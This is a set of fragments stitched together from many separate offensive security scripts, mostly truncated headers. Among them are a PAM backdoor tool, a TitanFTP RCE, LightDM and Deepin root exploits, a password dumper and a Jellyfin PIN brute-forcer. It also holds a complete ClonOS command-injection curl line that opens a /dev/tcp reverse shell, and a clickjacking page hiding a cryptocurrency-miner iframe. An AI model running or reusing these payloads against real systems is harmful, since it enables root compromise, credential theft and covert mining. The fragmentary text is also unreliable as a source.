#!/bin/bash
# Detect PAM backdoors created by linux-pam-backdoor:
# https://github.com/zephrax/linux-pam-backdoor
#
# Note: this will likely only work with PAM version 1.3.0.
# ---
# $ ./backdoor.sh -v 1.3.0 -p some_s3cr3t_p455word
# Automatic PAM Backdoor
# PAM Version: 1.3.0
# Password: some_s3cr3t_p455word
#!/bin/bash
# titanftp-server-admin-event-handler-rce - TitanFTP Server Administrator Event Handler Authenticated RCE
#
# Requires remote administration interface to be enabled. (Default port 31001/tcp).
# Creates a new server and adds an event handler to execute a PowerShell reverse shell.
# ---
# $ ./titanftp-server-admin-event-handler-rce
# TitanFTP Server Administrator Event Handler Authenticated RCE
#
# Generating PowerShell reverse shell to 172.16.191.165:1337 ...
#!/bin/bash
# clonos-root-rce
# Trivial ClonOs remote root RCE exploit for CVE-2019-18418 discovered by İbrahim Hakan Şeker
# Note: Start netcat listener on LHOST:LPORT first
RHOST="172.16.191.240"
LHOST="172.16.191.165"
LPORT=1337
curl "http://${RHOST}/json.php" -H "X-Requested-With: XMLHttpRequest" -d "mode=jailAdd&path=/&form_data[jname]=\`sudo /usr/local/bin/cbsd bash -c \"0<%26118-;exec 118<>/dev/tcp/${LHOST}/${LPORT};sh <%26118 >%26118 2>%26118\"\`"
#!/usr/bin/env ruby
################################################################################
# Jellyfin Password Reset PIN Brute Force #
# #
# Usually completes within a few minutes. Tested on Jellyfin version 10.2.2. #
# This will likely also work on Emby Media Server, but untested. #
# #
# Note: cURL must be installed and in $PATH #
# #
# Note: Upon successful exploitation, the password will be reset for all users, #
#!/bin/bash
# Ubuntu LightDM Guest Account Local Privilege Escalation (CVE-2017-7358)
# ---
# Usage: ./lightpwn
# A LightDM session is required. Exploitation will lock the current session,
# and could take several minutes. It usually takes about a minute.
# When the screen stops flashing, unlock the session and run: /bin/subash
# ---
# There's nothing new or special about this exploit.
# It's simply a slightly more weaponised version of the original PoC,
#!/bin/bash
# Deepin Linux 15.5 lastore-daemon D-Bus Local Root Exploit
#
# The lastore-daemon D-Bus configuration on Deepin Linux 15.5 permits any user
# in the sudo group to install arbitrary packages without providing a password,
# resulting in code execution as root. By default, the first user created on
# the system is a member of the sudo group.
# ~ bcoles
#
# Based on exploit by King's Way: https://www.exploit-db.com/exploits/39433/
#!/bin/bash
# lightdmdump
# ---
# Dump clear text passwords from lightdm sessions on Ubuntu
# Requires root privileges to dump lightdm process memory
# Tested on Ubuntu 14.04.1 LTS and 16.04.4 LTS
# ---
# Bug discovered by: Sven Blumenstein
# Disclosure date: 2017-09-15
# Source: https://bugs.launchpad.net/ubuntu/+source/lightdm/+bug/1717490
#!/bin/bash
# List sub-domains using crt.sh
set -euo pipefail
IFS=$'\n\t'
error() {
  echo "[ERROR] $*"
  exit 1
}
#!/usr/bin/env ruby
###################################################
# ----------------------------------------------- #
# Fuzz Origami Ruby gem with mutated PDF files #
# ----------------------------------------------- #
# #
# Each test case is written to 'fuzz.pdf' in the #
# current working directory. #
# #
# Crashes and the associated backtrace are saved #
<html>
<body>
<div id="container" style="border:0;margin:0;position:absolute;width:5px;height:5px;overflow:hidden;cursor:pointer;opacity:0.01">
<iframe style="position:absolute;border:0;width:5px;height:100px;top:-85px;cursor:pointer;" src="https://authedmine.com/media/miner.html?key=your_public_key"></iframe>
</div>
</body>
<script>
window.onmousemove = function(e) {
var container = document.getElementById("container");